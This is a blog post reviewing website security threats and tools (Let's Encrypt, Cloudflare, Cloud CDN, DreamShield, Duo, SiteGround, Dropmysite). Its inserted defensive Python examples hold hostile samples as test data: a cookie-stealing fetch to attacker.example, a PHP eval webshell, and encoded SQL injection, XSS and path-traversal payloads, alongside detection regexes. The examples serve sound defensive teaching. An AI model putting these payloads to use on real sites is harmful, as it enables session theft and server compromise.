11/07/2024 | News release | Distributed by Public on 11/07/2024 06:27
Updated: November 07, 2024
Published: May 22, 2020
Like many people, I spend most of my day online. Whether for work, browsing, or making purchases, I trust that most sites have strong website security. The last thing I want to think about when visiting websites is whether or not my data is safe - and if I get the feeling it's not secure, I quickly lose trust in the business (and get far away from the site).
Security breaches come in all shapes and sizes, but they often spell financial trouble for the targeted company. IBM's Cost of a Data Breach Report put the average cost of a breach in 2024 at nearly $5 million. Beyond the direct cost, a breach damages your brand image, authority, and trustworthiness. What's even more alarming is that identifying and containing a breach takes an average of 277 days, which means attackers typically have months of access before anyone notices.
As business activities transition online, it's clear that website owners shouldn't see security as an afterthought or optional luxury - it should be a priority. The good news is that there are many services available to help you secure your website. In this post, I'll share expert takeaways on the top threats and ways to prevent them. I'll also recommend various high-quality website security tools and outline key features to help you make your decision.
Website security is any practice, action, or protocol that protects a website against cyberattacks and other security threats. There are many ways to secure a website, including Transport Layer Security (TLS) certificates, still widely called SSL certificates, to encrypt traffic between the browser and your server; web application firewalls (WAF) to filter malicious requests before they reach your application; and two-factor authentication (2FA) so that a guessed or phished password alone is not enough to log in.
Any company with a website and customers must take website security seriously. Not only do these measures protect your company data, but they also help build trust with your customers, who expect their information to be kept safe when they visit your website.
Joe Warnimont, security and technical expert at HostingAdvice, explains website safety perfectly:
"A secure website protects three main elements: your brand, your customers, and your revenue," he says. "Website security ensures customers have no issue coming to your site as they know it's safe from cyberattacks and data breaches. A poorly secured website results in worse SEO results, lower customer trust, and downtime, cutting into your money-making potential."
Build a secure site with a free SSL certificate in HubSpot.
Pro tip: Want to check your website performance? Try HubSpot's free website grader to understand your current site security and overall performance.
Before choosing a website security service or optimizing your website for safety, it's important to know what exactly you need protection against. These are the most common website security threats you should know about.
Several IT experts I spoke with suggested third-party exposures are an underappreciated threat to website security. And they're a rising threat in the industry.
Data from Prevalent's Third-Party Risk Management Study found that 61% of companies experienced a third-party data breach or other security incidents in the past year.
Third-party JavaScript loaded into your pages is one of the most common forms. A lack of governance over which external scripts a site loads leads to data leaks, according to Simon Wijckmans, CEO at c/side.
"Modern websites rely heavily on externally loaded third-party scripts for functionality like analytics, chatbots, and display ads," says Wijckmans. "But a vulnerability or compromise at any of these myriad third-party providers can lead to widespread data breaches and security incidents when scripts get hijacked."
Eldin Scotland, IT Manager at Customer.io, suggests one way to mitigate these exposures is to implement a thorough vetting process when onboarding vendors.
"One way to ensure you limit any risk with third-party exposure is conducting third-party vendor assessments during the vetting process of new tools in your ecosystem and continuous monitoring by incorporating risk management into your contracts," he says.
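Vetting vendors reduces the odds of a compromise, but it does not stop a script that is modified after you approved it. The standard technical control for that is Subresource Integrity (SRI): the page pins each external script to the hash of the version you reviewed, and the browser refuses to run anything that no longer matches. The following is an added example, not code from the original article or from any vendor mentioned in it; the vendor script, the hijacked copy, and the cdn.vendor.example and attacker.example domains are all constructed placeholders.

```python
"""Subresource Integrity (SRI) for third-party scripts (added example)."""
import base64
import hashlib
from html import escape

# Constructed sample data: a vendor analytics script as published, and a
# hijacked copy that adds a cookie-stealing beacon to a placeholder domain.
ORIGINAL_SCRIPT = b"window.analytics = function () { /* vendor code */ };\n"
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + (
    b"fetch('https://attacker.example/c?d=' + encodeURIComponent(document.cookie));\n"
)

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")  # the only ones browsers accept


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return an SRI token, e.g. 'sha384-<base64 digest>', for the given bytes."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"SRI permits only {SRI_ALGORITHMS}")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, algorithm: str = "sha384") -> str:
    """Build a <script> tag that pins the file at `src` to the hash of `content`.

    crossorigin="anonymous" is required for scripts from another origin; without
    it the browser cannot read the response to hash it and refuses to run it.
    """
    return (
        f'<script src="{escape(src, quote=True)}" '
        f'integrity="{sri_hash(content, algorithm)}" '
        f'crossorigin="anonymous"></script>'
    )


def integrity_matches(content: bytes, integrity: str) -> bool:
    """Emulate the browser check: does the fetched content match the pinned hash?

    An integrity attribute may list several tokens separated by whitespace.
    Browsers use only the tokens of the strongest algorithm present and accept
    the resource if any one of them matches.
    """
    strength = {name: i for i, name in enumerate(SRI_ALGORITHMS)}
    tokens = [t for t in integrity.split() if t.split("-", 1)[0] in strength]
    if not tokens:
        return False  # fail closed here; a real browser would run the script unchecked
    best = max(strength[t.split("-", 1)[0]] for t in tokens)
    return any(
        sri_hash(content, t.split("-", 1)[0]) == t
        for t in tokens
        if strength[t.split("-", 1)[0]] == best
    )


def demo() -> dict:
    """Pin the vendor script, then check the original and the hijacked copy."""
    pinned = sri_hash(ORIGINAL_SCRIPT)
    return {
        "tag": script_tag("https://cdn.vendor.example/analytics.js", ORIGINAL_SCRIPT),
        "original_ok": integrity_matches(ORIGINAL_SCRIPT, pinned),
        "tampered_ok": integrity_matches(TAMPERED_SCRIPT, pinned),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The trade-off is operational: a vendor that ships a new version of the script without telling you will see it blocked until you update the hash, which is exactly the point. SRI is only workable for scripts the vendor serves at a fixed, versioned URL; scripts that rewrite themselves on every request cannot be pinned and are better governed by a Content Security Policy that limits where scripts may be loaded from.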
One of the most common types of attack is the brute-force attack, in which a bot or attacker tries passwords or other secrets by trial and error until one works. Two variants dominate in practice: credential stuffing, which replays username and password pairs leaked from other sites, and password spraying, which tries a few common passwords against many accounts to avoid triggering lockouts. Rate limiting, locking an account after repeated failures, and 2FA each cut the attacker's odds.
The 2024 Data Breach Investigations Report by Verizon found that 21% of web application attacks are brute-force.
Distributed denial-of-service (DDoS) attacks overwhelm a website or server with malicious traffic in an attempt to crash the online service and limit access for legitimate users. These attacks are typically done using botnets, a network of compromised computers or bots controlled by hackers.
Mitigating a DDoS attack means telling legitimate traffic apart from malicious traffic, which is hard when the attack imitates normal requests. IT experts typically recommend a layered approach: rate limiting, a web application firewall, and a CDN that spreads the load across many locations. None of these stops an attack from being launched, but together they limit how much of it reaches your servers and keep the site reachable for real users.
Phishing attacks are when a scammer sends a fraudulent message, usually an email or text, with a link to a malicious website. These attacks can be used to plant malware, commit identity theft, and steal credentials.
As a company, the best way to prevent phishing is through continuous education. Employees must be encouraged to use 2FA, create strong passwords, and be able to identify suspicious messages and links.
"Avoiding phishing attacks requires continuous security training, demonstrating an awareness of spotting a potential phishing email, and reporting any suspicious emails so that security teams can further investigate," Scotland recommends.
Use HubSpot's checklist to ensure your website is meeting security standards.
Internet safety is incredibly important, especially on your website. I'll share a few tools you can use to inspire engagement and customer loyalty by creating a safe, secure site.
A Secure Sockets Layer (SSL) certificate, more precisely a TLS certificate, is a small file that ties your domain name to a public key and is signed by a certificate authority that browsers trust. The browser uses it to confirm it has reached the genuine server rather than an impostor, and the TLS handshake then encrypts everything exchanged between the two, so data in transit cannot be read or altered by anyone sitting on the network path.
Websites served over TLS have URLs that start with https:// instead of http://. A certificate is essential, especially if users exchange sensitive information with you, like credit card numbers or private file downloads, and it shows visitors that you're taking steps to protect their information.
Google also favors https:// pages in its search rankings. Chrome long marked encrypted pages with a padlock in the address bar; since 2023 it shows a neutral icon instead and concentrates on the negative case, labeling plain-HTTP pages "Not secure".
When a site's certificate is invalid or expired, Chrome immediately warns users with a full-page interstitial and recommends that they go back rather than continue.
If you want a certificate for your site, your hosting provider will usually supply one, either free or for a fee. You can also obtain one yourself from an external certificate authority such as Let's Encrypt.
Let's Encrypt is a free certificate authority run by the Internet Security Research Group (ISRG). Unlike other services on this list, it doesn't have an extensive feature list; it simply issues domain-validated certificates for free, through the automated ACME protocol, so a client such as Certbot can request and renew them without manual work. I like that anyone who controls a domain name can use Let's Encrypt to get a free, browser-trusted certificate.
If you're weighing multiple SSL certificate providers and skeptical because Let's Encrypt is free, not to fear - it is trusted, sponsored, and funded by well-known businesses like Shopify, Cisco, and GitHub. Below, I've listed the pros and cons to help you make your decision.
Pros:
- Let's Encrypt is a free service.
- Simple installation process with easy-to-follow documentation.
- Google Chrome is a platinum supporter, proving its prioritization for website security.
- No downtime during setup, meaning that users will still be able to access and browse your site as you implement SSL.
- WordPress.com hosting automatically enables Let's Encrypt.

Cons:
- Only offers domain-validated (DV) certificates, so businesses that want organization or extended validation need another provider.
- Certificates are valid for only 90 days, so renewal must be automated (Let's Encrypt recommends renewing after 60 days to leave a margin for failures).
- No customer support, so you're required to self-manage using the documentation and community forum.
- Rate limits apply: up to 100 names per certificate and 50 certificates per registered domain per week, so the limits mainly affect larger deployments.
A web application firewall (WAF) inspects incoming HTTP requests for suspicious patterns and blocks them based on a set of rules. A WAF can protect against common web attacks such as cross-site scripting (XSS) and structured query language (SQL) injection, and, when deployed at the network edge, helps absorb DDoS traffic before it reaches your servers. There are many WAF products available, and Cloudflare is a popular option.
Cloudflare is a WAF and cloud firewall that filters incoming traffic before it reaches your origin. Its managed rules are tuned from attacks observed across the roughly 25 million sites it protects, so baseline protection is automated and doesn't require any additional input from you.
However, if you notice that there are repeat, specific attacks against your site, you can define your own set of rules and block specific IP addresses (shown below).
I personally like Cloudflare's Under Attack mode, which gives users with compromised sites immediate access to additional protections.
In terms of pricing, plans range from free to $200 per month for Business, with Enterprise priced case by case. If you're using HubSpot's CMS, a WAF for your site is included at no extra cost.
Pros:
- Easy onboarding process with simple set-up and documentation.
- Built on a global network that learns from threats to ensure better security standards.
- Analytics and reporting dashboards to see overviews of blocked threats, which is not a common feature of WAF services.

Cons:
- Only available to a single user account for your business.
- Some users report difficult configurations with Amazon Web Services.
- Free version takes 24 hours to propagate, only conducts scans once per week, and users report difficulty integrating with external SSL.
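To make the two mechanisms described above concrete, an IP blocklist and custom pattern rules, here is an added example of a request filter in miniature. It is not Cloudflare's code or a production ruleset; the three rules are illustrative, the addresses come from the RFC 5737 documentation ranges, and the traffic sample is constructed. The one detail it is careful about is the one every real WAF must get right: the request is URL-decoded before matching, because attackers encode (and double-encode) payloads precisely to slip past filters that match the raw bytes.

```python
"""WAF-style request filter: IP blocklist plus normalised pattern rules (added example)."""
import ipaddress
import re
from urllib.parse import unquote_plus

# Addresses you have decided to block outright.
BLOCKLIST = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.23/32")]

# A tiny rule set for illustration only; real WAFs combine thousands of
# signatures with anomaly scoring to keep false positives manageable.
RULES = {
    "sqli": re.compile(
        r"(\bunion\b.{0,40}\bselect\b|'\s*or\s+\d+\s*=\s*\d+|;\s*drop\s+table\b)",
        re.I | re.S),
    "xss": re.compile(r"(<\s*script\b|javascript\s*:|\bon\w+\s*=)", re.I),
    "path_traversal": re.compile(r"(\.\./|\.\.\\)"),
}


def normalise(value: str) -> str:
    """URL-decode twice (double encoding is a classic evasion), then squash whitespace."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded)


def inspect(request: dict) -> tuple:
    """Return ('block', reason) or ('allow', '') for one request.

    `request` is a dict with client_ip, path, query, body and user_agent keys.
    The blocklist is checked first because it is the cheapest test.
    """
    client = ipaddress.ip_address(request["client_ip"])
    if any(client in net for net in BLOCKLIST):
        return ("block", "ip_blocklist")
    fields = [request.get(k, "") for k in ("path", "query", "body", "user_agent")]
    for rule_name, pattern in RULES.items():
        if any(pattern.search(normalise(field)) for field in fields):
            return ("block", rule_name)
    return ("allow", "")


# Constructed traffic sample: one blocklisted client, three encoded attacks,
# one innocent search that trips the SQL rule, and one clean request.
SAMPLE_REQUESTS = [
    {"client_ip": "198.51.100.23", "path": "/", "query": "",
     "body": "", "user_agent": "curl/8.0"},
    {"client_ip": "192.0.2.10", "path": "/products", "query": "id=1%27%20OR%201%3D1--",
     "body": "", "user_agent": "Mozilla/5.0"},
    {"client_ip": "192.0.2.11", "path": "/search",
     "query": "q=%253Cscript%253Ealert(1)%253C%252Fscript%253E",
     "body": "", "user_agent": "Mozilla/5.0"},
    {"client_ip": "192.0.2.12", "path": "/download", "query": "file=..%2F..%2Fetc%2Fpasswd",
     "body": "", "user_agent": "Mozilla/5.0"},
    {"client_ip": "192.0.2.13", "path": "/search", "query": "q=union+station+select+hotels",
     "body": "", "user_agent": "Mozilla/5.0"},
    {"client_ip": "192.0.2.14", "path": "/search", "query": "q=blue+running+shoes",
     "body": "", "user_agent": "Mozilla/5.0"},
]


def audit(requests=SAMPLE_REQUESTS) -> list:
    """Run every sample request through the filter."""
    return [inspect(r) for r in requests]


if __name__ == "__main__":
    for req, decision in zip(SAMPLE_REQUESTS, audit()):
        print(f"{req['client_ip']:>15} {req['path']}?{req['query']} -> {decision}")
```

The fifth request is deliberate: a search for "union station select hotels" is blocked by the SQL injection rule even though it is harmless. Pattern rules always carry this false-positive cost, which is why hosted WAFs invest in scoring and tuning and why you should review what your custom rules block before enabling them in blocking rather than logging mode.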
A content delivery network (CDN) is a system of connected servers that makes your site accessible and quick to load for users across the globe. From a security standpoint, a global CDN matters because it keeps traffic from piling up on your central (origin) servers. An overloaded origin is easier to knock offline and slower to recover, which is exactly what a denial-of-service attacker is counting on.
I think of it like this: If you're a site owner who uses a server based in Florida, that same server will need to accommodate browsers in Washington, D.C., Paris, and Singapore. That server won't be able to manage an influx of traffic from all over the world, but a global CDN can do so through a globally distributed network of servers. Instead of slower load speeds, a global CDN improves page performance for all browsers, regardless of location.
If you're already using a hosting provider, they probably handle CDN or offer a CDN bundle, so you won't need to do additional research. If not, Cloud CDN by Google is a viable third-party solution.
Cloud CDN is a fast, reliable service that quickly and securely delivers your site content to users across the globe. It does so through a single global anycast IP address that routes each visitor to a nearby edge location, reducing load time and optimizing last-mile performance, so all of your site content is served quickly, not just the first loaded elements. The anycast IP process is displayed in the image below.
Cloud CDN also works with popular open-source JavaScript libraries and frameworks such as jQuery, Dojo, and SPF. Cost-wise, users are charged by requests and data served, so totals will vary by site; refer to Google's Cloud CDN pricing page for the current structure.
Pros:
- Managed SSL certificates at no extra cost, but you can also bring your own.
- Terraform support.
- Real-time site metric alerts via email, Slack, or your preferred service.
- Fully managed CDN, requiring no additional work on your part.

Cons:
- Requires technical understanding, but the in-depth guides can assist first-time learners.
- Pricing structure may be difficult for small businesses to manage.
- Some users report long wait times for customer support issues.
DreamShield is a malware removal service offered by DreamHost. It works by scanning your website weekly to detect and remove any malicious code.
This service ensures your site remains secure by identifying potential threats early and preventing damage or data breaches. DreamShield is suitable for all types of websites, from personal blogs to business sites, and doesn't require any technical skills to use. In my opinion, it's a straightforward way to maintain the security of your online presence.
Pros:
- DreamShield runs automated weekly malware scans, ensuring regular site security checks.
- It detects and removes malicious code, providing comprehensive protection.
- The service is user-friendly, and no technical skills are required to operate it.
- DreamShield sends alerts if threats are detected, keeping you informed.

Cons:
- Scans are weekly, which may miss rapidly emerging threats.
- Limited customization options for advanced users.
- Only available to DreamHost customers, limiting its use to this hosting provider.
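It helps to know what a hosted malware scan actually does, because that explains both its value and the "weekly may miss things" caveat. At its core a scanner compares the files in your web root against what it expects and flags anything added, changed, or matching known malicious patterns. The following is an added example, not DreamShield's code or the original article's: it records a baseline of SHA-256 hashes, re-scans later to report added, modified, and deleted files, and checks PHP files for a few common webshell indicators. The sample site and the planted webshell are constructed in a temporary directory so the whole thing runs offline.

```python
"""File-integrity and webshell scan of a web root (added example)."""
import hashlib
import re
import tempfile
from pathlib import Path

# Functions that almost every PHP webshell calls; a real scanner has far more
# signatures and also looks at obfuscation, file permissions and timestamps.
SUSPICIOUS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|base64_decode)\s*\(", re.I)
SCANNED_SUFFIXES = {".php", ".phtml", ".js", ".html"}


def hash_tree(root: Path) -> dict:
    """Map each relative file path under `root` to its SHA-256 hex digest."""
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            result[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return result


def diff_baseline(baseline: dict, current: dict) -> dict:
    """Report what changed since the baseline was recorded."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "modified": modified, "deleted": deleted}


def suspicious_files(root: Path) -> list:
    """Return server-side files that contain a webshell indicator."""
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.suffix in SCANNED_SUFFIXES or path.name == ".htaccess":
            text = path.read_text(errors="replace")
            if SUSPICIOUS.search(text):
                hits.append(path.relative_to(root).as_posix())
    return hits


def demo() -> dict:
    """Constructed site: take a baseline, plant a webshell, re-scan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content" / "uploads").mkdir(parents=True)
        (root / "index.php").write_text("<?php get_header(); the_content(); ?>\n")
        (root / "wp-content" / "theme.css").write_text("body { color: #333; }\n")
        baseline = hash_tree(root)  # in practice, persist this outside the web root

        # Compromise: a webshell dropped in the uploads folder (writable by the
        # web server), the front page edited to include it, and a file removed.
        shell = root / "wp-content" / "uploads" / "image.php"
        shell.write_text('<?php eval(base64_decode($_POST["c"])); ?>\n')
        (root / "index.php").write_text(
            "<?php include 'wp-content/uploads/image.php'; get_header(); ?>\n")
        (root / "wp-content" / "theme.css").unlink()

        report = diff_baseline(baseline, hash_tree(root))
        report["suspicious"] = suspicious_files(root)
        return report


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

Two points follow from the code. The baseline must be stored somewhere the attacker cannot edit, or they will simply update it after planting their files. And a scan only sees what exists at scan time, which is why a weekly cadence can miss a shell that is dropped, used, and deleted between two runs; a daily scan, or a hook that scans uploads as they land, closes that gap.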
I think one of the simplest ways to ensure security on your website is to use a website monitoring service (WMS). These tools monitor site performance, like page outages, as well as vulnerabilities that threaten site security. Essentially, a WMS proactively identifies issues so you can address them before they get out of control.
In my experience, LogicMonitor is a well-rated WMS tool. It is a hybrid SaaS: the platform runs in the cloud, while a lightweight collector runs inside your own network to gather data. As its name suggests, the service monitors your site and builds analytics dashboards (shown below) that explain site performance and alert you to current or emerging problems.
LogicMonitor is highly rated by G2 and Gartner. The service is priced by volume.
Pros:
- More than 2,000 available integrations to customize your system and collect the data you need to run your site.
- Guided set-up process and interactive data presentations to understand site performance.
- Phone, SMS, email, or Slack alerts for high-priority issues.
- Multi-site monitoring.

Cons:
- Customers have reported a longer, involved set-up process.
- Pricing can be a little confusing, with multiple coverage options and add-ons.
- Requires a web connection to access, so any pressing issue might require you to stop what you're doing and find internet access.
Two-factor authentication (2FA) is a simple security solution to protect against targeted attacks like brute-force login. While other tools on this list focus on site safety, 2FA ensures that those who can access your site security tools, like administrators, are the only ones to do so.
2FA protects secure files and sensitive data by confirming a user's identity with two independent factors before granting access: typically something they know, like a password, plus something they have, like a phone that receives a push notification or generates a one-time code. An attacker who has only guessed or phished the password is stopped at the second step.
Duo Security is a two-factor authentication service that ensures secure access for any administrator or user on your site. It uses multi-factor authentication, remote access with secure VPNs, and adaptive access policies to grant and deny access based on user roles.
I personally like that you can use Duo Security to ensure that any administrator or user with editing capability on your site is who they say they are at login, not a malicious hacker or spammy bot.
Pricing options range from free to $9 per user, per month.
Let's go over some pros and cons of Duo Security, as reported by customers.
Pros:
- Remote access, ensuring that users working remotely are securely and safely accessing your site.
- Ability to define security measures and restrict access based on custom standards, like user, device, or location.

Cons:
- Tedious, involved set-up and authentication process for new users.
- Single sign-on (SSO) products require on-premises servers, so tools for offline or remote work may require additional purchases.
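The six-digit code from an authenticator app, which Duo and most competitors support alongside push, is a time-based one-time password (TOTP, RFC 6238). Seeing the algorithm in full shows why a stolen password alone is not enough and where the two verification details that matter live: the acceptance window for clock drift and the replay check. The following is an added example, not Duo's code or the original article's. It uses the shared secret from the RFC 6238 test vectors so the output can be checked against the published values; the account name, issuer, and timestamps are constructed.

```python
"""TOTP (RFC 6238) second factor: enrolment, generation and verification (added example)."""
import base64
import hashlib
import hmac
import secrets
import struct
import time
from urllib.parse import quote

# Shared secret from RFC 6238 Appendix B (SHA-1, 30-second steps, 8-digit codes
# in the published vectors).
RFC6238_SECRET = b"12345678901234567890"


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226) for a 64-bit counter."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation: low nibble picks the window
    truncated = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(truncated % 10 ** digits).zfill(digits)


def totp(key: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """Time-based code: the HOTP of the current time step number."""
    return hotp(key, int(unix_time) // step, digits)


class Enrolment:
    """Server-side state for one user's authenticator."""

    def __init__(self, secret=None, step: int = 30, digits: int = 6):
        self.secret = secret or secrets.token_bytes(20)  # 160-bit secret for SHA-1
        self.step = step
        self.digits = digits
        self.last_counter = -1  # highest step already accepted; blocks replay

    def provisioning_uri(self, account: str, issuer: str) -> str:
        """otpauth:// URI that authenticator apps read from a QR code at enrolment."""
        b32 = base64.b32encode(self.secret).decode("ascii").rstrip("=")
        label = f"{quote(issuer)}:{quote(account)}"
        return (f"otpauth://totp/{label}?secret={b32}&issuer={quote(issuer)}"
                f"&algorithm=SHA1&digits={self.digits}&period={self.step}")

    def verify(self, code: str, unix_time: int, skew: int = 1) -> bool:
        """Accept the code for the current step or `skew` steps either side.

        The window tolerates clock drift between phone and server. Each step is
        usable once: a match at or below last_counter is rejected, so a code
        captured by a phishing page cannot be replayed after the victim used it.
        """
        now = int(unix_time) // self.step
        for counter in range(now - skew, now + skew + 1):
            if counter <= self.last_counter:
                continue
            if hmac.compare_digest(hotp(self.secret, counter, self.digits), code):
                self.last_counter = counter
                return True
        return False


def demo() -> dict:
    """Enrol with the RFC secret, then try a valid login, a replay and a stale code."""
    enrol = Enrolment(RFC6238_SECRET, digits=8)
    code_at_59 = totp(RFC6238_SECRET, 59, digits=8)
    return {
        "uri": enrol.provisioning_uri("alice@example.com", "Example Corp"),
        "code_at_59": code_at_59,                        # RFC vector: 94287082
        "accepted": enrol.verify(code_at_59, 75),        # same 30-second step
        "replayed": enrol.verify(code_at_59, 80),        # same code again: rejected
        "too_old": Enrolment(RFC6238_SECRET, digits=8).verify(code_at_59, 150),
        "current_code": totp(RFC6238_SECRET, int(time.time())),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The limitation worth stating plainly is that a TOTP code proves possession of the secret, not the identity of the site asking for it: a real-time phishing page can relay the code to the genuine site within the 30-second window. That is why Duo's push with number matching, or better still FIDO2/WebAuthn keys, are preferred for administrators; the replay check above stops reuse of a code, not its first fraudulent use.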
Hosting is the backbone to your website, as it's how you can have a live site in the first place. Without it, your site wouldn't exist.
I think SiteGround is a great choice when looking for a web hosting provider with a security-first approach. The SiteGround platform is built with security and speed in mind and has all the security features your site needs: free SSL pre-installed by default, smart in-built WAF on all servers, geo-distributed daily backups on all plans, 24/7 server monitoring, AI-powered anti-bot system, managed PHP, comprehensive monthly security reports, WordPress-specific security tools and plugins, and many more.
Additionally, SiteGround users can add the company's SiteScanner - a tool for scanning files, domains, and URLs to prevent the upload and use of malicious files and ensure your website is well-protected.
All WordPress sites hosted at SiteGround can take advantage of additional WordPress-specific security features like:
Pros:
- Premium security and speed features included for free with all plans.
- Daily geo-distributed backups included even in the smallest plan.
- Knowledgeable and friendly 24/7 support.
- Easy-to-use site management with the in-house built Site Tools control panel.

Cons:
- On-demand backups available only on the highest plans.
- 24/7 support is only available in English, Spanish, and German.
Another critical element is keeping backups of your site files, both in case your site is compromised and for when you switch hosting providers. A recent, tested backup is what lets you restore known-good files rather than trying to clean an infected site in place. While you can back up manually or through your host, I suggest using Dropmysite to automate the process.
Dropmysite is a backup and recovery tool that connects to your server with SFTP, FTP, or rsync credentials and stores copies of your site files in cloud storage. The process is fully automated and offers a one-click restore for files and site content that has been compromised or accidentally deleted.
You can elect to back up all elements of your site or select specific site files and folders that you deem most critical. Most importantly, all site file backups are stored securely on Amazon Web Services using Server Side Encryption.
Pricing depends on the amount of storage you use and can range from $29.99 for 10GB sites to $1299.99 for 1000GB sites.
Below, I've listed the pros and cons of Dropmysite, as reported by current users.
Pros:
- Easy-to-follow set-up process.
- Automated backups, requiring no additional user input.
- Pricing by storage size, so small businesses aren't paying for more than they need.

Cons:
- Backups aren't incremental or based on file changes, so all site files are re-downloaded each time.
- No additional features or add-ons, but a full-service host can likely make up for any additional needs.
What I've learned from the IT experts I talked to is that website security should be an ongoing priority if you have a website. Cybersecurity threats remain prevalent and will continue to evolve as technology does. In addition to ongoing training, software updates, and monitoring, it's worth investing in website security tools.
Fortunately, there are a significant number of tools available to website owners hoping to prioritize site security. You can either choose to use multiple tools or opt to use a full-service host that will do most of the work for you.
Regardless of the route you choose to take, you should choose a service that aligns with your pricing needs, provides the necessary features, and, most of all, creates a secure experience for your company and your users.
Editor's note: This post was originally published in May 2020 and has been updated for comprehensiveness.